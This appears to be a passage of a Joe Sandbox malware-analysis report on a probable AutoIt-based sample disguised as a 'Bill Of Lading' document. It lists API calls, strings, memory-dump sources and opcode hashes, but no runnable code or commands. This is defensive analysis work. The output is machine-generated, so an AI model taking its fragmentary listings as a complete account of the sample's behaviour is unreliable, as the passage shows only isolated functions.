• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: htonsinet_addr
• String ID: 255.255.255.255
• API String ID: 3832099526-2422070025
• Opcode ID: 8f81358a7508e033a1ccca041802c5cf6ea433113977ffec7d790c03bda6a3ba
• Instruction ID: e3b5e028fda38c0aed97ec3d425ece65e45bc088e5f3683a6f0e3ee8de0e9224
• Opcode Fuzzy Hash: 8f81358a7508e033a1ccca041802c5cf6ea433113977ffec7d790c03bda6a3ba
• Instruction Fuzzy Hash: 6F11253620030057DA10EB69C882F9BB394EFC4728F00896BFA105B283D679F45A832E
APIs
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• SendMessageW.USER32(00000000,000001A2,000000FF,00000000), ref: 00469547
Strings
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: MessageSend_wcslen
• String ID: ComboBox$ListBox
• API String ID: 455545452-1403004172
• Opcode ID: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
• Instruction ID: d7878a024921556205560296ec06e6abf53b779169672b4943ab7ad66f70e2c7
• Opcode Fuzzy Hash: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
• Instruction Fuzzy Hash: 2601D6327011106B8600BB299C019AFB39DDBC2370F544A2FF965573D1EA39AC0E476A
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00442B8C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: InternetOpen
• String ID: <local>
• API String ID: 2038078732-4266983199
• Opcode ID: 6ab628e9b643b7f337e7eb9a1eb164a667740d16f62f34970bb7649561c47b18
• Instruction ID: 525aca290fb55aeb65c4bf55ca0deee88c9418ef2a1db54778758d1eb2e06c8a
• Opcode Fuzzy Hash: 6ab628e9b643b7f337e7eb9a1eb164a667740d16f62f34970bb7649561c47b18
• Instruction Fuzzy Hash: 9011A934144751AAF621DF108D86FB77794FB50B01F50480FF9866B2C0D6F4B848C766
APIs
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• SendMessageW.USER32(00000000,00000180,00000000,00000000), ref: 00469660
Strings
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: MessageSend_wcslen
• String ID: ComboBox$ListBox
• API String ID: 455545452-1403004172
• Opcode ID: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
• Instruction ID: 486d2595d5a7427da4a9c048e684990a8dc9cac685a8154682435d05c4426571
• Opcode Fuzzy Hash: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
• Instruction Fuzzy Hash: A101D87274121027C600BA259C01AEBB39CEB96354F04443BF94597291EA6DED0E43AA
APIs
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• SendMessageW.USER32(00000182,00000182,?,00000000), ref: 004695D6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: MessageSend_wcslen
• String ID: ComboBox$ListBox
• API String ID: 455545452-1403004172
• Opcode ID: ebc0188a5584a95c85a0cdadc4297c14a5cc600b4744d97cee4f9a5f6612b8f9
• Instruction ID: 72d13aeac174e9c1a3a177398698555a642000804846b33da1492f44d6438514
• Opcode Fuzzy Hash: ebc0188a5584a95c85a0cdadc4297c14a5cc600b4744d97cee4f9a5f6612b8f9
• Instruction Fuzzy Hash: 4D01A77374111067C610BA6A9C01AEB739CABD2364F44443BF94597292EA7DED0E43AA
APIs
• SendMessageW.USER32(?,00001001,00000000,?), ref: 004560BA
  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
• wsprintfW.USER32 ref: 004560E9
Strings
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: MessageSend_mallocwsprintf
• String ID: %d/%02d/%02d
• API String ID: 1262938277-328681919
• Opcode ID: dc5fd9a877cd0fc352ed6de9b5f97ee6fb2dcbb154e3a48ad4a1e49fbb654ae8
• Instruction ID: 2a73c44ac592e0fe880a68d863bd42ca8887a008949f121bccc13d44bcf2ebb3
• Opcode Fuzzy Hash: dc5fd9a877cd0fc352ed6de9b5f97ee6fb2dcbb154e3a48ad4a1e49fbb654ae8
• Instruction Fuzzy Hash: 13F08272744220A7E2105BA5AC01BBFB3D4EB84762F10443BFE44D12C0E66E8455D7BA
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0044226C
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0044227F
  • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
Strings
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
                                                                                                                      • Opcode ID: 62d1e1a02585172d548c808ed695c1d9d3028cc69dace886715b1b3d1423c17e
                                                                                                                      • Instruction ID: f0ed9326d30a696a9ade51716a531e8bd1705000bbe21894ac7a57cb5589152b
                                                                                                                      • Opcode Fuzzy Hash: 62d1e1a02585172d548c808ed695c1d9d3028cc69dace886715b1b3d1423c17e
                                                                                                                      • Instruction Fuzzy Hash: 71D0A772F8130177E92077706D0FFCB26246F14710F010C3AB305AA1C0D4E8D440C358
                                                                                                                      APIs
                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00442240
                                                                                                                      • PostMessageW.USER32(00000000), ref: 00442247
                                                                                                                        • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FindMessagePostSleepWindow
                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                      • API String ID: 529655941-2988720461
                                                                                                                      • Opcode ID: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
                                                                                                                      • Instruction ID: d1e5b9be119239975405e397b0c0efdc35250005003305bf123d4268f2ecb06f
                                                                                                                      • Opcode Fuzzy Hash: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
                                                                                                                      • Instruction Fuzzy Hash: 4DD05E72B813013BE92076706D0FF8B26246B14710F010C2AB205AA1C0D4E8A4408358
                                                                                                                      APIs
                                                                                                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00439522
                                                                                                                        • Part of subcall function 00411A1F: _doexit.LIBCMT ref: 00411A2B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Message_doexit
                                                                                                                      • String ID: AutoIt$Error allocating memory.
                                                                                                                      • API String ID: 1993061046-4017498283
                                                                                                                      • Opcode ID: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
                                                                                                                      • Instruction ID: 5d68346425d2699d55792fe39b85c2381918ba1f955abba655776c5540820644
                                                                                                                      • Opcode Fuzzy Hash: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
                                                                                                                      • Instruction Fuzzy Hash: 82B092343C038627E20437A01C0BF8C28049B64F42F220C2AB308384D259D90080231E